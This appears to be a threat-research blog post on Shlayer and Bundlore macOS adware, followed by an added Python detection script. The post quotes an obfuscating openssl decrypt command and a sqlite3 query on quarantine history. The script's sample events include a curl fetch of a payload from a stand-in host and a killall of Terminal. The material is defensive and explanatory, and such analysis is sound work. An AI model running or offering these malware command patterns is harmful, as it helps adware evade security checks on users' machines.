Uptycs threat research team analyzed the macOS malware threat landscape and discovered that Shlayer and Bundlore are the most predominant malware.

The Uptycs threat research team has observed that over 90% of the macOS malware in our daily analysis and customer telemetry alerts uses shell scripts. Though these scripts have slight variations, they mostly belong to a plague of adware strains: Shlayer and Bundlore. These are the most predominant malware families on macOS, with a history of evading and bypassing the built-in XProtect, Gatekeeper, Notarization and File Quarantine security features of macOS.

In this post, we showcase the different variants of malicious shell scripts used by Shlayer and Bundlore that have been constantly in circulation. We also discuss the built-in macOS utilities leveraged by these malware families and showcase the Uptycs EDR detection capabilities.

Shlayer and Bundlore – malicious shell scripts

The malicious shell scripts used by Shlayer and Bundlore are usually malvertising-focused adware bundlers that use shell scripts in the kill chain to download and install an adware payload. The installers are usually macOS disk image files (DMG) that are distributed via compromised Google search results or downloaded from websites with poor reputation (such as cracks and keygens sites). Upon installation, the disk image mounts, thereby initiating the bash shell script installation. The bash script is either a single file or a group of files pointing to the main bash script. An example of one such DMG file with bash scripts is shown below (see Figure 1).

Figure 1: DMG file initiating bash script installation

The bash files download the second-stage adware payload, which generally lures the victim into installing a fake version of Flash Player, as shown below (see Figure 2). Upon installation, the malware bombards the victim's machine with ads and also intercepts browser searches in order to modify the search results to promote more ads.

Shlayer and Bundlore binaries use several macOS utilities in their attack kill chain. Most variants are known to leverage at least 3 of the 5 built-in macOS commands and utilities: openssl, curl, sqlite3, killall and funzip. The prevalence of these binaries in our daily incoming samples from threat intelligence systems and customer telemetry for the past quarter is shown below (see Figure 3).

Figure 3: macOS utilities leveraged by Shlayer and Bundlore

The working and usage of these utilities in the attack kill chain is described below.

Openssl

The openssl program is a command-line tool in macOS for using the various cryptography functions (SSL, TLS) of OpenSSL's crypto library from the shell. We have observed malicious binaries use openssl with base64 encoding and AES (Advanced Encryption Standard) in CBC (Cipher Block Chaining) mode to thwart security scanners, in the format shown below:

openssl enc -aes-256-cbc -d -A -base64 -pass pass:

Curl

curl is a macOS command-line tool used for transferring data using various network protocols. We have observed malicious binaries use curl in the format shown below:

Killall

killall is used to kill the processes specified by a command name or pattern match. The malicious binaries use this command to kill the script running from the terminal, in the format shown below:

Sqlite3

SQLite is a transactional SQL database engine present in macOS, generally used to create databases that can be transported across machines. The malicious binaries use sqlite3 to retrieve the history of files downloaded from the internet, in the format shown below:

sqlite3 /Users//Library/Preferences/2 select LSQuarantineDataURLString from LSQuarantineEvent where LSQuarantineDataURLString like "%s3.%" order by LSQuarantineTimeStamp desc limit 5

Funzip

funzip is a macOS utility that extracts a ZIP or gzip file directly to output, from an archive or other piped input. The malicious binaries use funzip with a password, combined with the head or tail commands, to extract the malicious binary in the format shown below:
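The observation that most variants chain at least 3 of the 5 utilities lends itself to a simple EDR-style detection. The following is an added example, not Uptycs' code and not from the post; it assumes process events exposed as pid/ppid/cmdline dicts (the shape an EDR or osquery process table provides), and the events it runs on are constructed.

```python
import re
from collections import defaultdict

# One pattern per utility. openssl and sqlite3 only count with the argument shape
# seen in the post (decrypt + base64 + literal password; a query against the
# quarantine events table); curl, killall and funzip count on any use.
INDICATORS = {
    "openssl": re.compile(
        r"\bopenssl\s+enc\b(?=.*\s-d\b)(?=.*\s(?:-a|-base64)\b)(?=.*\s-pass\s+pass:)"),
    "sqlite3": re.compile(r"\bsqlite3\b.*\bLSQuarantineEvent\b", re.IGNORECASE),
    "curl": re.compile(r"\bcurl\b"),
    "killall": re.compile(r"\bkillall\b"),
    "funzip": re.compile(r"\bfunzip\b"),
}
ALERT_THRESHOLD = 3  # "at least 3 of the 5" utilities per installer script

def utilities_per_parent(events):
    """Group child process events by ppid; return {ppid: sorted distinct utilities hit}."""
    hits = defaultdict(set)
    for ev in events:  # each event: {"pid", "ppid", "cmdline"}
        for name, pattern in INDICATORS.items():
            if pattern.search(ev["cmdline"]):
                hits[ev["ppid"]].add(name)
    return {ppid: sorted(names) for ppid, names in hits.items()}

def flag_scripts(events, threshold=ALERT_THRESHOLD):
    """Return ppids whose children used at least `threshold` distinct utilities."""
    return sorted(p for p, names in utilities_per_parent(events).items()
                  if len(names) >= threshold)

# Constructed sample events: ppid 500 is a Shlayer-style installer script; ppid 700
# is a benign admin script that also calls curl and openssl, but not in the
# malicious shape, so it stays below the threshold.
SAMPLE_EVENTS = [
    {"pid": 501, "ppid": 500, "cmdline": "sqlite3 /Users/victim/Library/Preferences/"
     "com.apple.LaunchServices.QuarantineEventsV2 select LSQuarantineDataURLString "
     "from LSQuarantineEvent order by LSQuarantineTimeStamp desc limit 5"},
    {"pid": 502, "ppid": 500, "cmdline": "curl -s http://stage2.example/payload"},
    {"pid": 503, "ppid": 500,
     "cmdline": "openssl enc -aes-256-cbc -d -A -base64 -pass pass:REDACTED"},
    {"pid": 504, "ppid": 500, "cmdline": "killall Terminal"},
    {"pid": 701, "ppid": 700, "cmdline": "curl -s https://example.com/status.json"},
    {"pid": 702, "ppid": 700,
     "cmdline": "openssl enc -aes-256-cbc -d -in backup.enc -out backup.tar"},
]
if __name__ == "__main__":
    for ppid, names in utilities_per_parent(SAMPLE_EVENTS).items():
        print(ppid, names)
    print("flagged:", flag_scripts(SAMPLE_EVENTS))
```

Grouping by parent rather than alerting on each utility alone keeps ordinary admin use of curl or openssl from firing; lowering the threshold trades that for sensitivity.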